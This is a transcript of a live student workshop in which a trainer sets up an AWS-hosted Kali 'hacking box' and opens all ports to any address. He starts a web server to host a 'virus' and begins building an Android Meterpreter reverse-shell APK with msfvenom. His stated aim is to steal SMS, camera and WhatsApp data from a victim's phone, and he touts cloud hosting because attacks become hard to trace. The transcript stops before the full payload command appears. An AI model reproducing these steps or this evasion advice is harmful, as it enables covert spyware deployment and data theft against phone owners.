Yes, sir. We are good to go.
Okay, good morning, students. Today we have with us Mr. Divyanshu Shukla, our distinguished guest, who is working as a director of Hackweather Limited, Delhi. And Mr. Divyanshu has experience of more than a decade in designing high-level applications.
Okay, good morning, students. Today we have with us Mr. Divyanshu Shukla.
He started his career as a cybersecurity professional in Intel Software Security, and also leads DEFCON Group USA. And he has been associated with the American Express credit card fraud detection training program also. And he has been delivering and training the people. And he has been with the IBM developer on Android technology. He is a renowned trainer who has trained DRDO scientists and government officials in Ministry of Home Affairs also. And he has conducted more than 17,000 programs for engineering and technical people and in the students, and has spoken for more than 200 conferences. Of course, he has been associated with the LA token for building cryptocurrency exchange. The core areas of training are Android, iOS, Linux, cloud, full stack, machine learning. And of course, he is a cybersecurity professional also. So without not wasting much time on elaborating everything, because there is a long list which can take more than 5 minutes to elaborate. So let's hand over the control to Mr. Divyanshu, who will take the session forward. Over to you, sir.
Thank you, sir. Thank you so much for having me here. I would like to thank, before we get started with the session, for the organization ITS, the heads of the organization, for inviting me for this workshop on cybersecurity, and especially a special thanks to you also for organizing the event for the candidates. So guys, my name is Divyanshu Shukla. I hope my voice is audible to all of you. And we are going to get started with cybersecurity workshop. The main objective of the workshop is to make you all understand how cybersecurity practically is implemented, and how we can make use of cybersecurity in various ways in order to protect the data with respect to industry, with respect to organizations, and with respect to our own selves. Because as you already know, in today's scenario, whether you are using mobile devices or any other electronic equipment, majority of the devices are currently connected with the network, or in one way or other, they are storing data in it somehow. So the data is at stake, and there are a lot of cybersecurity attacks which happens, which can compromise your data, and you may lose a I'm sorry. I believe my voice is audible now.
There was some disruption, sir. Now you are audible.
I'm so sorry. I'm so sorry. Shall we progress now?
Yes, sir. Yes.
Thank you. Thank you. I believe this is audible. Right. So guys, I believe I'm audible now properly. And let's go ahead. So, so the agenda of the meeting is organized into these 13 categories. And we are going to get started with introduction, followed by introduction to cybersecurity and attacks. Then we are going to understand introduction to mobile hacking using reverse shell. This is what we are going to do. This workshop will be organized in a practical oriented format, So you're going to learn a lot of techniques like how we use reverse shell, how we hack any device over internet. We're also going to set up a hacking machine using AWS Cloud. AWS Cloud is free and you can use AWS Cloud at just rupees 2. It gives free credentials for a very long time, approximately for an year if you're using the free tier version. So we are going to set up a hacking machine using AWS Cloud. Followed by that, we are going to create a web server for hosting virus and hacking files. So what are we going to do? We are going to set up a demonstration system where we are going to hack a mobile device and we are going to collect all that file and we are going to store it on a web server. So how we are going to create it? We are going to learn it practically. Followed by, in the next step, what are we going to do? We are going to create a mobile virus using Metasploit MSF Venom. This is a very basic technique basically highly effective concept, virus programs without any programming knowledge. Later, what you can do is you can, improve your knowledge and you can build more advanced level of virus. Then in step 6, what are we going to do? We're going to create a listener on the hacking machine using Metasploit meta handler. What this meta handler is going to do, it is going to receive the connections from the hacked mobile phones and you will be able to execute your commands on the remote devices and you will be able to extract data from those hacked devices. Now, what kind of things we are going to perform? We are going to execute certain commands like how to hack the SMS, how to hack camera, how to hack WhatsApp applications and various other applications. So we are going to try that and we are going to practically implement that stuff. I believe till now, this is clear. Till now, my voice is audible. Just give me a quick confirmation if we are clear up till here. All the students.
Yes, sir, your voice is
Yes, sir. Yes, sir.
audible.
Great. And it would be great, guys, if you can, be an active part of this workshop, because we are going to have it practically. We can have discussions about how things are happening. And I'm going to do things step by step. Also, I'm recording this video and post completion of this workshop, I'm going to share this video with you so that you can also practically implement it at your own place. Okay. So the demonstration which we are going to do can be executed by anyone. And I also am going to give you a lot of resources with which you can also be able to build advanced level of programs. Okay. Now, post completion of this, we are going to understand cybersecurity as a career and what are the current industrial requirements, why industry is hiring cybersecurity professionals. Okay. And what do you need to know in order to become a cybersecurity professional? Followed by that, we are going to give you introduction to Hackveda 1-to-1, where you will be able to access free learning resources. So we have created a free course curriculum in which we have implemented mobile hacking, website hacking, and a lot other techniques that how you can quickly, freely implement those techniques and access resources, and in order to protect yourself as well as the organization. So we have created that free learning resource, which we are going to give it to you. Apart from that, on step number 10, we are going to introduce you how you can make use of Hackveda's platform for interview preparation in order to become a Hackveda certified professional for cybersecurity and other technologies which Hackveda offers. Followed by, you are also going to understand how to get paid internships at Hackveda. Hackveda is currently hiring cybersecurity interns, where we are building some government-based projects for those we hire interns, those who can work on cybersecurity with us. So we are going to give you an introduction to a couple of projects, that what kind of projects we are doing at Hackveda, what kind of industrial projects are required in the industry at the moment, which Hackveda is building. And finally, we are going to have question and answers on step number 13. So this is going to be the agenda of today's meeting, and we are going to complete this by 12:30 today. So guys, I believe we all are good to go. Just again, give me a quick confirmation that you are ready to have all these 13 things in your
Yes, sir.
Great. So let's get to the next slide. So guys, what next we do have is a quick introduction to Hackveda. What is Hackveda and what are we doing at Hackveda? So Hackveda initially started in 2011 as a workforce development organization, but since 2014, we are into software development and research development. We are also an AWS consultant where we build cloud infrastructure for various companies. We are into IoT development. We work on digital ads network. We also work on affiliate marketing. And currently our focus is on recruitment and talent acquisition. So these are some of the things which we are currently implementing at Hackveda. It's a decade since we started in 2011. And we have been at ITS, I believe, somewhere around 2013. Where we physically delivered some sessions at ITS on, I think chatbot development and cybersecurity, of course. Coming to my profile, my name is Devanshu Shukla. I have started my career in cybersecurity in 2011. And post that, since I have been sitting at a very important position in my organization, I have learned a lot of technologies during my work experience at Hackveda. So I have developed a lot of applications in IoT, in machine learning, deep learning, neural networks. And currently what I'm doing is I'm working on leadership and management, customer engagement, and customer experience segment in Hackveda. Coming to the next point, now let's get started with the demo. So what are we going to do? I'm going to quickly walk you through that this is what we're going to implement. So now I'm going to take you to the step number 3, where we are going to get an introduction to cybersecurity and the kind of attacks which are happening in the industry. For that, I would like to share one pretty good video from our YouTube channel, youtube.com/Hackveda. I'll just quickly get here. Allow me a minute. So this is a pretty good video which we have recently created. And our team, the video team, has created this video, and I'm going to share that with you. And it's going to give you a very, a very nice understanding of how, what kind of hackers are there and what kind of attacks are possible. And then we will get into the demonstration of the attack. So just allow me a minute and let me just share that with you. Right. So here, I'm just sharing a link with you all in the chat section. And I'm also going to play it for a moment for you guys. So this is the kind of attacks which are possible. Okay. And I'm going to quickly walk you through with what kind of important attacks are there.
Let's talk about your role as an internet user and how cyber threats affect your experience, whether at home, at work, or traveling. Information security, also known as InfoSec, is important to people of all ages. It's a team sport, and we each have a role to play. As technology continues to rapidly change in this information age, we have a shared responsibility to make cyberspace a more secure environment for ourselves and for future generations. While a lot of training and education content is geared towards security for organizations, we want to provide suggestions for how individuals can be safe on the internet. Whenever you're online, you're vulnerable, and thwarting evolving cyber attacks demands constant vigilance. We like to think of it as becoming a human firewall. It's common sense. You can outsmart attackers with security awareness. By learning what actions you can take as an individual user, you can reduce your risks online. Let's start. For data protection, security and privacy go hand in hand. Data privacy relates to business policies that define appropriate data management, such as collection, retention, and deletion. Cybersecurity comprises methods for protecting networks, devices, and data from unauthorized access, and ensuring the confidentiality, integrity, and availability of all that information. Information security includes cybersecurity and physical security. Here are a few important terms to help you understand some of the risks. Vulnerabilities are flaws in software, firmware, or hardware that an attacker can exploit to perform unauthorized actions in a system. Attackers take advantage of these errors to infect computers with malware or perform other malicious activities. Attackers seek to exploit vulnerabilities in software and computer systems for their own gain, and their actions are typically in violation of the intended use of the system. Threats range from mere mischief to stealing or altering information. Attack surface is any exposed place in your environment that a bad actor can use to gain entry to or extract something valuable from the places that you want to protect. After gaining initial access to a network, adversaries traverse the allowed communication paths between network devices to gain deeper access. Therefore, it's the goal of cybersecurity professionals to identify all the attack surfaces, reduce their size, and decrease the risk of attack. Malware is an unwanted file or program that can cause harm to a computer or compromise data stored on a computer. Examples of malicious code classification include a virus, worm, botnet, Trojan horse, DDoS, and ransomware. Malicious data files are non-executable, such as a Microsoft Word document, an Adobe PDF, a zip file, or an image file that exploits weaknesses in the software program used to open it. Attackers frequently use this to install malware on a victim's system, commonly distributing the files via email, social media, and compromised websites. Social engineering is extremely lucrative because people are deceived into believing it's legitimate. The goal of a social engineer is to obtain your trust, then exploit that relationship to coax you into either divulging sensitive information about yourself or another entity and giving them access to your network. Threat actors prefer the path of least resistance. Why waste an expensive 0 day when social engineering works? They hack the psyche of targets, who rarely realize the disguises, as well as rely on publicly available intelligence and interactions to generate victim profiles. These scams lure victims by appearing trustworthy, and they leverage emotional triggers such as curiosity, urgency, and intimidation. Nowadays, it seems that everything relies on the internet. Email, smartphones, video games, social media, applications, online shopping, medical equipment, and medical records. The list goes on. The downside is that cyber threats pose a serious risk to your business as well as your personal data. For example, malware can erase your entire system. An attacker might break into your system and alter your files. A cybercriminal can use your computer to attack others. Or an attacker might steal your credit card information and make unauthorized purchases. There is no guarantee that even with the best precautions, some of these things won't occur. However, there are steps you can take right now to minimize the chances. The first step is to recognize potential cyber risks. Just as technology continues to move forward, making our lives easier and more connected, cybercriminals use sophisticated technologies to compromise technology and online habits. Attackers like to exploit social media content, even our vacation plans, because these activities require you to provide sensitive information online. Always remember, highly sensitive and private information requires vigilant protection. For example, your personally identifiable information, PII, includes anything that can distinguish you, such as your full name, your birthday, biometrics, your passport, ID, credit card, or phone numbers, and your home or email address. You must also protect your company proprietary data. Sharing sensitive information online presents a huge opportunity for cybercriminals to commit credit card fraud, identity theft, as well as compromise your access to company proprietary resources. Simply put, data is the new gold. That's why it is imperative to follow privacy and data protection laws at work. For each business role, the acceptable level of risk to cybersecurity and privacy must be documented. Industry-recognized security practices must be incorporated, and appropriate safeguards implemented to protect personal information as well as data, systems, activities, and assets of an organization. The goal is to create a security-minded workforce. Cybercrime is a global threat with no borders. Consequently, regulatory industries and governments, such as the General Data Protection Regulation, GDPR in Europe, as well as other countries, have prioritized the security of information with new laws and compliance standards. Remember to be the protector of your information. Human error accounts for nearly all data breaches. Be wary of suspicious requests, unknown attempts at contact, and unsolicited information that comes to you in any form of communication. Ask your company's privacy office if you have any questions. They are there to help you navigate these risks and can provide recommendations on how to be cyber safe. Protect personal and proprietary data. Be suspicious of any email, text, or voice message requesting sensitive information or financial transactions. Hover over all hyperlinks before clicking to confirm they are from legitimate sources. Use multi-step verification that requires a unique security code for authenticating to a system. Ensure your browser, mobile devices, and computer systems are updated with the most recent protections. Never reuse passwords across multiple accounts and devices. Lock your screen device when away from your workstation. Follow company policy. If you don't know, ask. Let's review why attackers have such a high success rate. Malicious attacks are constantly increasing. Research shows that 91% of cyber incidents that occur inside an organization are caused by some form of human error, such as inadvertently clicking a spear-phishing email. Privileged access abuse is linked to an estimated 80% of data breaches. In a world where the odds are heavily tipped in favor of cyber adversaries, data security must take precedence. When it comes to cybersecurity, knowledge is power, and that's why, by implementing actions you can take, you can avoid common traps.
सर आपका माइक म्यूट है.
सर आपका माइक म्यूट है.
Is it audible now? I'm sorry. So guys, so I believe you got to know a little bit about cybersecurity through the video and the kind of attacks which are possible. And a couple of attacks we're going to perform today, which we have seen in the video. Okay. And we're going to do it step by step. So it's going to be very, very easy for all of you to practice it later also on your machines. Now, in order to do it, one of the most useful attack which hackers do on the clients is hacking the devices using a reverse shell. Okay. What do we mean by reverse shell? I'm going to explain it to you. Also, give me a confirmation. How many of you all understand Hindi? Just raise your hand. In Zoom, there is an option to raise your hand. Just raise your hand and let me know if you all know Hindi. So there would be, in case if you are, if there is a difficulty in understanding English, I will be making this workshop in a Hindi and English format. Okay. So I think everybody knows Hindi, I believe, right?
No issue, sir.
Great.
You can use either of the languages.
That's great. That's great. Okay, cool. So guys, so now what are we going to do? We're going to understand how do we hack devices using reverse shell. This is what we're going to get started with. So I'm going to, create a quick dashboard in order to make you understand how things can be done here. Let me just create a new dashboard once. Allow me a minute. Share. I'm going to create a new whiteboard for you. And I'm going to quickly explain you once how things are going to work. So consider I am sharing the concept of reverse shell with you initially. What is reverse shell and what is the meaning of a reverse shell? And then we are going to execute it in practical. So consider there is one device which could be a console device. Consider this as a console or a command prompt. Okay. Or You can also consider it as a terminal in Linux or Mac. And this could be an attacker machine. Okay, this is an attacker machine. And we also call this machine as a hacking box. We are going to create a hacking box for you. And on the other hand side, there could be a computer machine. There could be a computer machine on the other hand, consider it as a basic computer. There could be a mobile phone. Okay, consider this as a mobile phone device. I'm just drawing, just for the quick references. Now, what a hacker does, you can call this as client machine. Client machine, it could be a laptop, it could be a desktop, it could be a mobile device. Okay. Now, what actually happens now, as you already know, that we all are connected to internet, and often we try to download a lot of files. Okay. Suppose there is a mobile phone, and since today we are going to perform this demonstration on Android. So let's say there is an Android device. Now, what this Android device did, it used internet and it has requested a server to download a file. Okay. Consider there is a file here on the server, and this file is going to be a virus file. Okay. And since, as you all know, that in Android, we install APK files. So suppose there is a file known as virus.apk on server. Unknowingly, the user has downloaded this file. Okay. Now, what is going to happen? The user has downloaded his file on the mobile phone. As soon as the file gets executed, as soon as the file gets executed, what is going to happen? The console of this mobile phone through internet will go to the hacker's device, and hacker will be able to control the mobile phone using his command prompt. Okay, so hacker can control the mobile phone from here. Hacker can control the mobile device from here. Okay, so now what is happening? Now I'm going to, this is a basic scenario which we are going to deploy today, and I'm going to write these things in the statement format also. Okay, so there are two entities. One is the server, and server is the attacker. You can consider there is a server, and server is an attacker, and there is a client, and client is going to be the victim. Okay, now what is going to happen? There will be certain steps which we are going to perform. So hacker hosted a file with a virus. Okay, so we are going to execute this step. So hacker is going to host a file with a virus on his server. Okay. Second, hacker started a listener using multi-handler to get access to remote mobile device. Okay. And third, hacker executed the commands to steal data from mobile. Okay, this is what is going to happen on the hacker side. Now here, what is going to happen on the client side? So mistakenly, you can say mistakenly, victim downloaded a file from hacker's server. Okay, and victim's Android shell is also known as, command prompt, or you can also consider it as terminal, will be sent back to the hacker server. Okay, which means the shell of the mobile phone will be sent back to the hacker server, and hacker is going to control it. Then hacker can play, different commands like get SMS, send SMS, things like that. Get camera, get video, okay, get WhatsApp, get Instagram, all that stuff can be extracted. So hacker can send these commands to the mobile phone and can get access to the files. So guys, I believe this video is clear. This image is clear to you all. If anybody has any questions at the moment, please unmute your mic and you can speak your question. Anyone? Anil Yadav has raised his hand. If you have any questions, feel free. Any questions, anyone? Or shall I proceed? Guys, any question? Or shall I proceed?
No, sir, proceed, sir.
We can proceed, right? Great. So I've saved this file as PDF and as a PNG. So this is what we are going to perform. Now, what are we going to do? We are going to set up this hacking box on an AWS cloud. Okay, this is what we are going to do. Set up hacking box on AWS cloud. And why are we going to set up this hacking cloud on the or hacking box on a cloud? Because when your hacking box is on internet, okay, you will be able to access shells from any device in the world. This is the first advantage. Second advantage is nobody can trace who has hacked. Okay, so if you have created a account on a server, okay, on a cloud, and suppose you have created an instance in US or Ukraine or in any other country, okay, the victim will feel like that the attacker has compromised his device from somewhere on from other country or from other location. Okay, so a lot of hackers in today's scenario, they make use of cloud boxes in order to hack the devices. They steal the data and then they offline they download the data or they keep the data into any other secured server. So guys, I believe the scenario which we are going to create for the reverse shell is very, very clear to you all. And I have saved it. Okay, now let's get started. So first, we are going to continue with setting up the hacking box. Then we are going to run that malicious payload on a mobile phone, and we are going to compromise the mobile phone. Okay, shall we go ahead? Is this clear? Just give me a quick confirmation. Nice. Okay. So guys, I believe my voice is pretty clear to everyone, and you all are able to follow what are we doing. So we are done till here. We are done till introduction to the cybersecurity and attacks and introduction to mobile hacking using reverse shell. Now we are going to set up a hacking machine using AWS cloud. Okay. For this, you need to have an AWS account. In case if you don't have an AWS account, you can set up an AWS account free of cost. Okay. AWS offers you a certain duration with which you can access AWS cloud for free, which is of approximately 12 months if you're using the free tier version. But initially, to get access to the AWS account, you need one credit card, which will charge ₹2 from you once, and then it will be returned. Okay, so you can set up an AWS account, which is free of cost, and I will share a video with you with which how you will be able to create the AWS account. Okay, so I'm sharing that video with you. Create AWS account hardware. Okay, here is the video, and I am sharing that video with you so that you all will be able to create that post completion of the session. And I have shared that on chat with you all. Okay. Now, coming to the next point, let's get started with creation of the instance. So what I do have is, once your cloud account is ready, then you have to go to console.aws.amazon.com. This is the URL where we can get access to the AWS instances, where we can create our own hacking box. Okay. So I'm going to a server here, trustingmind@gmail.com. This is my account using which I'm going to create my server. And this is going to be a hack box, which I'm going to create 6TP6T6. I'm going to log into this. So I have, okay, I'm sorry. I think it's another one. Let me get to the new account. Okay, allow me a minute. Yes, 33MWR4. Okay, so I've logged into the AWS account, and now I'm going to walk you through with the process. So what are we going to do? We are here at step number 5. We are going to set up a hacking machine using AWS cloud. Okay, so in order to do that, we have to go to all services and we have to go to EC2 service. Okay, what EC2 does, it gives you access to create a virtual machine instance. Okay, this virtual machine instance can be considered as a original machine. Okay, it could be acting as a server, and you can host any of your applications on this virtual server. So we are going to create a virtual server by going to the launch instance option at the top right corner. So I'm going to click on launch instance, and I'm going to create a Kali Linux machine. So Kali, I think you all would have heard about what Kali is. Kali Linux is an operating system which is known as a penetration testing operating system. It includes a lot of hacking tools in it, which you can use, and you can set this up on cloud. Setting up on cloud is beneficial because all the mobile phones or the other devices which you will be hacking, you will be able to access them on internet, and you don't need to turn your machines off. So suppose you have started your virus at the moment, and the victim has clicked on your application somewhere later. Okay, even then, if he has accessed your application somewhere later, his phone will be compromised or his device will be compromised and will be connected to your server. And when you will log into your server, you will be able to access that mobile phone, okay, or any other device which has been hacked. So we are going to quickly create the Kali Linux machine. I'm going to select it. Now, once the Amazon machine image is selected, there is no charge on Kali Linux machine, and you can select the free tier machine in order to stay away from the charges. So you can see that there is a machine known as T2 Micro, which states free tier eligible. The meaning of free tier eligible is you won't be charged, and micro instances are eligible for the AWS free usage tier for the first 12 months following your AWS sign up date. Okay, you get up to 750 hours of micro instances each month. So that's where you can create an AWS account and use your server for a very, very long time. So I'm going to select T2 Micro free tier eligible, and I'm going to click on review and launch. Now, once I clicked on review and launch, one update I need to do here, and this update is management of the security group. Okay, what do we do in the security group? Here we have to allow certain ports on which we want to have the shells of the victims. Okay, so the victim device, once it is going to be hacked, it is going to create a network connection with our server, and this network connection will be created on a port number. Okay, so what do we need to do? We need to open certain ports so that we can receive the connection from the hacked mobile phones. So that's where we need to create some ports here. So what I'm doing, I'm creating a rule here, and in the custom TCP rule, I am opening certain ports. Suppose I'm opening all the ports currently at the moment, 65,535. So there are totally 65,536 ports in the TCP protocol, and I'm currently allowing access to any of the ports which is required. Or in case if you want to use a range of the ports, you can define that also. So generally, what do? We make use of the ports in the even format, or you can start using port numbers from 4,000 to 5,000, anything like that. You can select any of the ports as required. Okay, but currently I'm opening access to 65,535. Now I have to allow these port on all the IP addresses on the virtual machine instance, which means the victim can be on any network in the world. Okay, specifying with 0.0.0.0 means I am allowing any of the victim to share his hacked shell to me. Okay, that's why we have specified 0.0.0.0. The meaning of this source is everywhere. We can accept connection, we can accept incoming connections from everywhere in the world. Okay, whichever device has been compromised. So we have specified this, and finally we are going to click on review and launch. So once we are here, we are going to launch this AWS instance. Now, what do? We also need to have a key pair with which only we can have access to our hacking box. So I'm going to create a new key pair, and I'm going to call this key pair as ITS key. Okay. So since we are having this workshop for ITS, I am creating a new key with the name ITS key. And using this ITS key, only I will be able to access my hacking box, and no one else will be able to access my hacking box. Okay. So I will access my hacking box, and then I'm going to create viruses there, and I'm going to compromise the mobile devices. So let's quickly click on download key pair, and you can see a file has been downloaded, and I will quickly show you what do we have got in the file here. So here is the file its_key.pem, and if I open this with the, let me just show you with how does it look like. I can open that in brackets for you. Let me see if we have brackets here. We'll get to the applications, brackets, and I'll show that how it looks like. So the key which is given to us contains certain information, and this is a private key file. This private key file is a SSH private key file, which we are going to use in order to connect to our hacking box. Okay. Now, so I'm going to close it for a moment, and I'm going to show you now what do we need to do. So now we are going to click on launch instance, and our hacking box is going to get ready. So within a couple of minutes, we can quickly turn a new server on, which could be our hacking server, and it saves us a lot of time. It saves us, it can keep on running, and it's highly beneficial for a hacker. So now we can quickly go to view instances. View instances is at the right bottom on the screen. So I'll click on view instances, and here, if you can see, this is my hacking server, and I'm going to call it as my hacking box. Okay, so a new server with the name hacking box has been created. It is currently running, and we have got a public IPv4 address for this server. Okay, so guys, what I'm doing is I am copying this IP address, and I'm sharing this IP address with you all. So hacking box IP address. So this is going to be our hacking box IP address. Okay, currently, since we have not started the Apache server on this, we cannot access it through URL at the moment, but we can log into it, and I'm going to set up the server, and I'm going to show you how we are going to use it. So for the time being, what are we going to do? I'm going to keep this information, let's say, on a notepad. Allow me a minute. I'm going to create an ITS cybersecurity workshop. Okay, and let's keep it a little big so that you all will be able to see what are we. Okay, now, so this is going to be our hacking box, and the hacking box is currently running on this IP address 13.234.75.207. Okay, now, so if we quickly check back what all we have completed till now, so we have done the following. We are done with up till this part. So we have created a web server on, we have created a hacking machine up till here. Let me just quickly do that. So we are done till step number 5, where we have set up a hacking machine using AWS Cloud. Now, the next part which we are going to do is we are going to create a web server for hosting virus and hacked files. Okay, and how we are going to do that? Let's quickly get started with this. So now we are going to set up an Apache server, And in order to do that, we need to connect to our hacking box using SSH. Okay. You can connect to SSH using Windows. You can connect to SSH using command prompt in Windows. You can connect to SSH using terminal in Linux, and you can connect to SSH using Mac. Okay. So I'm currently opening my terminal. Since I'm using Mac machine, the commands are same for all the operating systems. Okay. So what are we going to do? I'm going to SSH and I'm going to use the key file in order to connect to this server. Also, you don't need to remember this command. Once you are done creating your machine on AWS, the command is available over here. Okay. So if I show you, you can click on your server, whatever server you have created, and then you can go to the connect option at the top. Once you click on connect option, it shows you an option known as SSH client, and the command with which you have to connect is displayed over here. Okay. So the command is SSH-I, which means specify the key, itskey.pem, which we have recently downloaded, and then we have to connect to the server. Okay. So here the username needs to be changed. The username would be Kali, and this should be the IP address of your server. Okay. So we are going to connect to the server using SSH now. So how we are going to do it? So in my downloads directory, okay, in my downloads directory, I have just got itskey.pem. So this is going to be my key, which I'm going to use. Followed by this, I'm going to connect to Kali @ and the IP address. Okay. And the IP address of our newly created server is 13.234.75.207. So we are going to specify it and we are going to press enter. So once we press enter, it is going to make a connection to the server. And currently we are accessing our hacking box server, which is created in some other region. And we're going to access its console, and then we are going to create our virus. Okay. So I will say yes. Okay. There is one more thing which we do need to do. You can see that while we connect, we also have to run this command in order to ensure the key is not publicly viewable. So in order to do that, we need to change the permissions on the key using chmod 400. So this will make our key non-publicly visible. Okay, that it's required. So before connecting to our server, it shows permission denied because the key was publicly viewable at the moment. So I'm going to change it to chmod 400, and I'm going to change it to downloads its_key.pm. Okay. So once the permission is given that the key is not publicly viewable now, this is my private key. Now I'm going to make the connection once again. So the connection will be done using SSH-I and the path to the key file, followed by the username Kali @ IP address of your EC2 server. And this IP address should be the public IP address, not the private IP address. Okay. So once you have defined the public IP address, once you have typed the public IP address, you can press enter. And now you will be connected to the Kali server. Now you can see that on the left bottom, if you can see, we have got a prompt here. And this means currently we are in the Kali Linux server. Okay. So if I am executing this command ls here, which means currently I'm in Kali Linux, and I can execute certain commands like uname, which show me the operating system. Okay. So the current operating system is Linux operating system, which is a Kali Linux operating system. So this means now I have access to my hacking machine. Okay. So let me just create the scenario for you. On the left-hand side, I'm going to have my hacking machine. And on the right-hand side, I'm going to have a victim machine, which I'm going to use for the connection. Okay. So if you can see on the right-hand side, this is my mobile phone, which I have currently connected here. And this is a live working mobile phone, and we are going to have a quick test with it. What I need from you all is, guys, just give me one mobile phone number. Anyone, just give me a mobile number, and I'm going to make a call to you just to ensure that this is a live device. Okay. So just type one mobile number in the chat section. Anyone, any guy? Yes, I've got from Nikunj Kaushik. So I'm going to make a call to the number is 990 At the moment, I'm calling via my hands. But once this mobile phone is going to be hacked, we are going to make calls through the command line or from the server itself. Okay, so I'm going to show you how that can be done. 4234. So this is 990 I'm making a call to the number, and it's going to NK. So Nikunj, once you get the call, just respond to us. You can pick up the call and yeah. So he's on the call at the moment. Okay, cool. So let's get going. So now what we are going to do, we are going to use this mobile device and we are going to hack this phone. Okay, let's see. So now what do we have in the scenario? On the left hand side, this is going to become the hacking machine and this is going to become the victim machine. Okay, and we are going to perform it live. So guys, let's see what next we are going to do. So at the moment, what do we have to do? We have to set up a server so that we can host the files, the hacked files on the AWS server itself. Okay, and we are here on this step. So we are going to create a web server for hosting virus and hacking files. Okay, so which web server we are going to create? There are various web servers available in the world, Nginx, Apache, and various other. Okay, we can set up a LAMP stack. So we are going to set up an Apache server here. By default, Apache server is installed on the Kali machine, just that I want to start its service. Okay, so we are going to execute this command sudo service Apache to start. Okay, and why are we using this command? This command helps us in starting an Apache server. Okay, so I'll start here. Start the Apache server on Kali Linux machine for hosting our virus and hacked files from victims. Okay, that's what we are going to perform here. Okay, so how are we going to start it? Let's have a look. So once it's sudo, I'm sorry. So the command is sudo service Apache to start. Okay, so once we execute this command, now you can see the Apache server has started. And how can we check that the Apache server has started? We can check this by going to a browser and watching, that the server is currently running. So what I'll do, I'll go to my mobile phone at the right hand side. You can see that I'm here on my mobile phone. I'm going to open a new tab. Okay, let's open a new tab. Let's just type the web address here. So I'm going to type my server's web address, and the server's web address is, you can quickly see that what I'm typing here. So I'm typing 13.234.75.207. So this is the server which I'm currently connecting, and now you can see that it shows that it's an Apache Debian default page. Okay, so this means the server which we have created, the Apache server, is currently running and it is accessible on the mobile phone. Okay, now what is the meaning of this? This means the mobile phone can access the information or it can connect to that server. And this is the very, very important factor. If the device cannot connect to your server, you won't be able to access its shell. Okay, and there is one more thing. A lot of times people ask me, can we set up a virtual machine Kali on our own virtual machine in a computer? You can do that, but until and unless you know the skills of port forwarding, you won't be able to receive the shell on your machine, okay, on that virtual machine in Kali. So it is always advised, whenever you are trying to perform a penetration test, make your servers on cloud and then you will be able to get the connections done, and you will be able to receive the shell from the hacked devices. Now coming to the next part. So from where this Apache page is coming, this Apache page is coming from the server directory, which is our World Wide Web HTML. Okay, so this is the directory where you can see that we have two files, index.html and indexenginex.debian.html. So this is the file index.html, which is currently returned when the client has made a connection to the server. So currently, what am I going to do? I'm going to remove this sudo -rm-rf star, which means I have cleared the HTML directory and I have done ls here. So this means I don't have an index page now. And what am I going to do? I'm going to my mobile phone and I'm refreshing the page. Okay, you can see that I'm refreshing the page, and currently you can see that it is just showing me that it is an index page. Okay, it is an Apache 2.4.52 Debian server hosted at this IP address on port number 80, 13.234.75 on port number 80, which means we don't have a page. We don't have an index page at the moment. All the files, whatever we are going to put, will be visible on the mobile phone. Okay. Now coming to the next point. So guys, at the moment we are here where we are ready with create a web server for hosting virus and hacked files. Okay. And what am I going to do? Let me just give you a quick basic demonstration of how do we create files or how it can be downloaded on the remote machine. So suppose I have made a file. Suppose I'm saying, hi, my name is Devanshu. Okay. So I'm going to make this file and I'm going to make it like devanshu.txt. So I've made a devanshu.txt file. Let me just do that with sudo. So in order to create the files, we do need to have the permissions here. Okay. Allow me a minute. Okay. So what we will do, let us just give the permissions first. Sudo chmod 777/var World Wide Web HTML. Okay. So we are giving the read, write, execute permission to the HTML directory, and now we will be able to create the files. So let's say I'm going to create the file now, devanshu.txt, and if I show you on the server, a sample file known as devanshu.txt has been created. And if I refresh the mobile phone, okay, if I refresh the mobile device, you can see that there is a devanshu.txt file has been created here. Can you see that? If I click on this file, devanshu.txt, you can see that it is showing me the text on the mobile phone. Hi, my name is Devanshu. Okay, guys, is that clear? Just give me a quick confirmation if you all are clear till here.
Yes, sir.
So this means whatever we are creating on the server, all that files can be accessed through that mobile device. Okay, but now our objective is to create a virus. Okay, so I'm going to remove this file. Okay, and I'll just get back to the server. I'll just get back to the main page. So currently, again, at the moment, I don't have any files here since I have removed it. Now let's get to step number 6. So what are we doing at step number 6 here? We're going to create a mobile virus using Metasploit MSF Venom. Okay. MSF Venom is an application available on Kali Linux, using which we can create virus programs. Okay, we can create virus payloads, and these virus payloads can perform different tasks for you. Different task means I can get the shell of a hacked machine, I can get command prompt of the hacked machine, I can get access to a specific directory, or I can get access to a specific file. Any of the objectives which I want to accomplish, we can get it accomplished by executing a payload on the victim device. Okay. Now, the current which we are going to perform is we are going to create a Meterpreter payload, and the name is Meterpreter. Meterpreter, Meterpreter payload. Okay. So Meterpreter payload is an exclusive payload which gives you access to multiple information access. Okay, so which means you can get access to the web. Sorry, you can get access to, you know, files, camera, audio, text, etc., OS commands, and a lot more. You can get a lot of information using Metapreta payload. Okay, so we are going to set up a Metapreta payload. So how can we do that? I'm going to show you now. So how we are going to create a mobile virus. So let's get to the shell. And now what we are going to do. So let's get going. So guys, are you ready to create your first virus? So we are going to create the first virus using MSF Venom. Okay. I'm going to show you the help of MSF Venom. What is MSF Venom and why do we use it? So you can see there are a lot of options here. MSF Venom is a Metasploit standalone payload generator. Payload means you can consider payload as a bomb, which is going to exploit the remote machine. Okay. So that's what is known as payload. We can generate multiple payloads with MSF Venom. And how can we create a payload? So we can call MSF Venom command. We can define a payload using option -p. -p stands for payload, the type of payload which you want to create. Okay. And there is a list of payloads available. You can use -option P, and you can use -list option in order to get a list of the payloads. Okay. So you can get a list of the payloads and you can use a payload of your own choice. The current payload which we are going to use is going to be an Android reverse TCP payload, which means we are going to use Android operating system. We are going to select the Metapreta payload, and this Metapreta payload is going to be a reverse shell payload, which means the payload is going to be executed on the mobile phone, and the mobile phone is going to give his shell to the hacking box or to the hacking server. Okay. And how it can be done? It can be done with a connection. And in order to make that connection, what do we need to do? We have to specify an IP address of the listening host. This L host means IP address where the listener is listening, and listener is going to be your hacking box IP server, which means your mobile phone is going to connect to this IP address once the payload is executed. So the IP address should be of the hacking server IP address. Okay. So once the payload is executed on a mobile phone, it is going to initiate a connection to this IP address, and it is going to give the shell to that hacking box server. Okay. Then we have to select the file format. The format should be an APK format, and we have to specify, we can specify the format as raw and the output as an APK file, since we are creating it for Android. If you want to create it for Windows, the same command will help you create a payload for Windows. Okay. Now, before creating the payload, I want to show you the list of the payloads. Okay. So we'll quickly get to MSF Venom -p -list. So let's quickly get a list of the payloads which are available. And let me have water by the time the list of payloads is coming. There are more than 500 payloads available, which you can actually use in order to exploit a machine. Guys, are you able to follow? Does this sound interesting?
Yes, sir.
Yes, sir.
